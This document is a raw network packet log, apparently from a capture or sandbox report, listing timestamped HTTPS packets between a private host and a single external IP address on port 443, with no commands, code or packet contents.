Jan 2, 2025 12:14:14.108777046 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.112397909 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.112456083 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.113894939 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.113951921 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.117227077 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.117288113 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.119075060 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.119165897 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.122417927 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.122482061 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.123972893 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.124043941 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.125600100 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.125665903 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.128933907 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.129003048 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.130636930 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.130700111 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.134151936 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.134232998 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.135865927 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.135922909 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.136249065 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.136298895 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.138097048 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.138160944 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.138818979 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.138880968 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.140609026 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.140671015 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.141824961 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.141881943 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.143192053 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.143244028 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.144078970 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.144143105 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.145375013 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.145431042 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.146522045 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.146580935 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.147411108 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.147476912 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.149180889 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.149235964 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.150017977 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.150093079 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.150949001 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.150998116 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.152518988 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.152571917 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.153799057 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.153847933 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.184302092 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.184370041 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.184387922 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.184444904 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.186837912 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.186928988 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.187165976 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.187237024 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.191961050 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.192022085 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.192049026 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.192097902 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.197133064 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.197197914 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.197217941 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.197272062 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.202528000 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.202564955 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.202733040 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.202739954 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.205746889 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.207372904 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.207406998 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.207429886 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.207434893 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.207464933 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.207484961 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.210683107 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.210752010 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.210762024 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.210772991 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.210817099 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.215673923 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.215735912 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.215900898 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.215951920 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.220873117 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.220937967 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.221009970 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.221055984 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.223788977 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.223845959 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.223850012 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.223865986 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.223884106 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.223901033 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.226433039 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.226500988 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.226530075 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.226581097 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.228137970 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.228197098 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.228209972 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.228265047 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.230839014 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.230870008 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.230895996 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.230901957 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.230947018 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.233335972 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.233392000 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.233412981 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.233417034 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.233431101 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.233467102 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.235867023 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.235929966 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.238428116 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.238483906 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.238498926 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.238502979 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.238543034 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.271517992 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.271570921 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.271585941 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.271600008 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.271636963 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.271636963 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.273734093 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.273835897 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.273844004 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.273869991 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.273880959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.273910046 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289475918 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289535046 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289597034 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289632082 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289644003 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289648056 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289659023 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289675951 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289684057 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289686918 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289719105 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289737940 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.289781094 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.289834023 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.290034056 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.290091038 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.296576023 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.296606064 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.296634912 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.296641111 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.296673059 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.296683073 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.297894955 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.297931910 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.297961950 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.297966003 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.297988892 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.298005104 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.302354097 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.302397013 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.302423954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.302428961 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.302442074 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.302479029 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.307580948 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.307642937 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.307647943 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.307660103 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.307672024 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.307687998 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.307708979 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.310486078 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.310534954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.310614109 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.310667038 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.313286066 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.313374043 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.313374996 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.313389063 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.313420057 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.313430071 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.314819098 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.314855099 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.314889908 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.314898014 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.314909935 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.314937115 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.317625999 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.317668915 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.317703962 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.317708015 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.317729950 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.317751884 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.320019960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.320063114 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.320076942 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.320081949 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.320106983 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.320115089 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.322499037 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.322551012 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.322619915 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.322674990 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.325120926 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.325177908 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.325180054 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.325191975 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.325221062 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.325232029 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.350068092 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.357903957 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.357976913 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.357981920 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.357991934 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.358022928 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.358050108 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.363115072 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.363166094 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.363184929 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.363209963 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.363223076 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.363259077 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.366662979 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.366703033 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.366714954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.366723061 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.366771936 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.373379946 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.373462915 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.373513937 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.373570919 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.376060963 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.376113892 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.376120090 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.376133919 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.376177073 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.376184940 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.380661011 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.380721092 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.380772114 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.380825043 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.384676933 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.384728909 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.384747028 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.384766102 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.384779930 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.384816885 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.389108896 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.389156103 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.389161110 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.389170885 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.389215946 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.394292116 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.394345045 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.394481897 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.394540071 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.397326946 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.397382975 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.397422075 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.397475004 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.401834965 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.401895046 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.401993990 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.402045012 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.402822018 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.402903080 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.402951956 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.403007030 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.405646086 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.405711889 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.405781984 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.405862093 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.408154011 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.408204079 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.408209085 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.408221960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.408236980 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.408252954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.408272982 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.410661936 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.410700083 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.410718918 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.410726070 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.410748959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.410754919 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.413183928 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.413225889 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.413250923 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.413269043 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.413299084 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.413306952 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.444773912 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.444839954 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.444839954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.444854021 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.444883108 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.444899082 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.450145960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.450195074 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.450217962 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.450227976 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.450238943 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.450351954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.453496933 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.453536034 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.453555107 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.453560114 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.453591108 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.453598022 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.461357117 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.461400032 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.461412907 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.461419106 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.461446047 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.461463928 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.464241982 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.464279890 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.464296103 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.464301109 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.464323044 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.464340925 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.468589067 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.468653917 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.468723059 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.468774080 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.472522974 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.472579002 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.472692966 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.472759008 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.477031946 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.477071047 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.477089882 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.477094889 CET	443	49984	39.103.20.59	192.168.2.6
